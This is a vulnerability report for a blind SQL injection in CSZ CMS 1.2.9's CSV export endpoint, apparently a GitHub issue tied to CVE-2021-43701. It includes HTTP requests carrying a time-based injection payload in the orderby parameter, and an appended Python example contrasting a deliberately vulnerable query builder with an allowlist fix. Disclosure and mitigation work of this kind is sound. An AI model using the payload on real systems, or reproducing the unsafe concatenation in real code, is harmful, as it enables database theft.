CVE-2021-43701: Bug Report: Blind SQL Injection Vulnerability · Issue #31 · cskaza/cszcms

CSZ CMS 1.2.9 has a Time and Boolean-based Blind SQL Injection vulnerability in the endpoint /admin/export/getcsv/article_db, via the fieldS[] and orderby parameters.

Description:
I found a Blind SQL Injection vulnerability in your CMS (version 1.2.9) “export” page. It refers to an injection attack where an attacker can execute malicious SQL statements that control a web application’s database server.

CMS Version:
1.2.9

Affected URL:
http://127.0.0.1/admin/export

Steps to Reproduce:

  1. First, log in to your panel.
  2. Then go to “General Menu > CSV Export / Import”.
  3. Then select any Table Name and Select Fields. Your request data will be:

GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=article_db_id&sort=ASC&submit=Export+to+CSV HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/CSZCMS/admin/export/article_db
Cookie: _ga=GA1.1.2106075763.1616578884; _pk_id.39.dc78=a6fc2902298b2ea4.1616578885.2.1616584112.1616584112.; back_to_admin=http%3A//127.0.0.1%3A8080/latest/admin/; mw-back-to-live-edit=true; show-sidebar-layouts=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CBAvqukS6679ewJxXOtVLBjexrDL7YqJvXggGnu2KyFWLhlDug5YVpb73EpNB%7C%242y%2410%248iuh7Co7azrDdHytSwJcmOenP.Q6xQmX0vmOiYNhu8PeouVHMpuaa; cszcookie_b54b1631aee51cb5309f41e2a09fec82csrf_cookie_csz=fb9f7d8059850bb0ad61e99c643f3e8a; b54b1631aee51cb5309f41e2a09fec82_cszsess=7pbpjbv1fkbu918ojs9424325ql2dioa
Connection: close
Upgrade-Insecure-Requests: 1

  4. The "fieldS[]" or "orderby" parameter is vulnerable. Let’s try to inject Blind SQL Injection using this query "(select(0)from(select(sleep(10)))a)" in the “orderby” parameter. Your request data will be:

GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/CSZCMS/admin/export/article_db
Cookie: _ga=GA1.1.2106075763.1616578884; _pk_id.39.dc78=a6fc2902298b2ea4.1616578885.2.1616584112.1616584112.; back_to_admin=http%3A//127.0.0.1%3A8080/latest/admin/; mw-back-to-live-edit=true; show-sidebar-layouts=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CBAvqukS6679ewJxXOtVLBjexrDL7YqJvXggGnu2KyFWLhlDug5YVpb73EpNB%7C%242y%2410%248iuh7Co7azrDdHytSwJcmOenP.Q6xQmX0vmOiYNhu8PeouVHMpuaa; cszcookie_b54b1631aee51cb5309f41e2a09fec82csrf_cookie_csz=fb9f7d8059850bb0ad61e99c643f3e8a; b54b1631aee51cb5309f41e2a09fec82_cszsess=7pbpjbv1fkbu918ojs9424325ql2dioa
Connection: close
Upgrade-Insecure-Requests: 1

Proof of Concept:
You can see the Proof of Concept in the video I’ve attached to confirm the vulnerability.

Blind.SQL.Injection.mp4

Impact:
An attacker could extract information from the database.

Let me know if any further info is required.

Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
BugsBD Limited
https://www.linkedin.com/in/rahadchowdhury/
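The root cause described in the report is that the `fieldS[]` and `orderby` request values end up inside the export statement as raw SQL. Column and table names cannot be passed as bound query parameters (binding would turn `ORDER BY ?` into ordering by a constant string), so the standard mitigation is to allowlist every identifier against the schema before it is placed in the statement. The following is an added Python example written for this page; it is not code from the report or from the CSZ CMS codebase (which is PHP), and the table/column names, the in-memory SQLite data and the `EXPORTABLE` map are constructed assumptions. It shows the vulnerable concatenation shape beside a hardened builder and feeds both the legitimate request and the report's `orderby` payload through the validated path.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for the CMS schema: table name -> exportable columns.
# The real CSZ CMS column list is not on the page; these names are assumptions.
EXPORTABLE = {
    "article_db": ("article_db_id", "article_title", "article_date"),
}
ALLOWED_SORT = ("ASC", "DESC")


class InvalidExportParameter(ValueError):
    """Raised when a request parameter is not an allowlisted identifier."""


def build_export_query_unsafe(table, fields, orderby, sort):
    """The vulnerable shape: request values are spliced straight into SQL.
    Whatever the client sends for `orderby` becomes part of the statement."""
    return f"SELECT {', '.join(fields)} FROM {table} ORDER BY {orderby} {sort}"


def build_export_query(table, fields, orderby, sort):
    """Hardened builder: identifiers cannot be bound as query parameters, so
    each one is checked against the schema allowlist, then quoted."""
    columns = EXPORTABLE.get(table)
    if columns is None:
        raise InvalidExportParameter(f"unknown table {table!r}")
    if not fields:
        raise InvalidExportParameter("no fields selected")
    for f in fields:
        if f not in columns:
            raise InvalidExportParameter(f"field {f!r} is not exportable")
    if orderby not in columns:
        raise InvalidExportParameter(f"orderby {orderby!r} is not a column")
    sort = sort.upper()
    if sort not in ALLOWED_SORT:
        raise InvalidExportParameter(f"sort {sort!r} must be ASC or DESC")
    # The names are already allowlisted; quoting them additionally keeps the
    # statement valid if a legitimate column name is ever a reserved word.
    select_list = ", ".join(f'"{f}"' for f in fields)
    return f'SELECT {select_list} FROM "{table}" ORDER BY "{orderby}" {sort}'


def parse_export_params(query_string):
    """Pull the export parameters out of the getcsv query string.
    parse_qs decodes fieldS%5B%5D to the PHP-style array key fieldS[]."""
    params = parse_qs(query_string, keep_blank_values=True)
    fields = params.get("fieldS[]", [])
    orderby = params.get("orderby", [""])[0]
    sort = params.get("sort", ["ASC"])[0]
    return fields, orderby, sort


def export_rows(table, query_string, conn):
    """Validate the request, build the statement, and return the exported rows."""
    fields, orderby, sort = parse_export_params(query_string)
    sql = build_export_query(table, fields, orderby, sort)
    return conn.execute(sql).fetchall()


def sample_db():
    """Constructed in-memory table with a few rows, for demonstration only."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE article_db "
        "(article_db_id INTEGER, article_title TEXT, article_date TEXT)"
    )
    conn.executemany("INSERT INTO article_db VALUES (?, ?, ?)", [
        (3, "third", "2021-11-03"),
        (1, "first", "2021-11-01"),
        (2, "second", "2021-11-02"),
    ])
    return conn


# Query strings taken from the two requests in the report (without the path).
LEGIT = "fieldS%5B%5D=article_db_id&orderby=article_db_id&sort=ASC&submit=Export+to+CSV"
INJECTED = ("fieldS%5B%5D=article_db_id"
            "&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV")


def demo():
    """Return (rows for the legitimate request, whether the payload was rejected)."""
    conn = sample_db()
    rows = export_rows("article_db", LEGIT, conn)
    try:
        export_rows("article_db", INJECTED, conn)
        rejected = False
    except InvalidExportParameter:
        rejected = True
    return rows, rejected


if __name__ == "__main__":
    print(demo())
```

Running `demo()` returns the three ids in ascending order for the legitimate request and `True` for the payload, because `(select(0)from(select(sleep(10)))a)` is not a column of `article_db` and never reaches the database. The same allowlist check belongs on `fieldS[]`, since the report names both parameters; logging each `InvalidExportParameter` with the offending value also gives a detection signal for probing of this endpoint.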
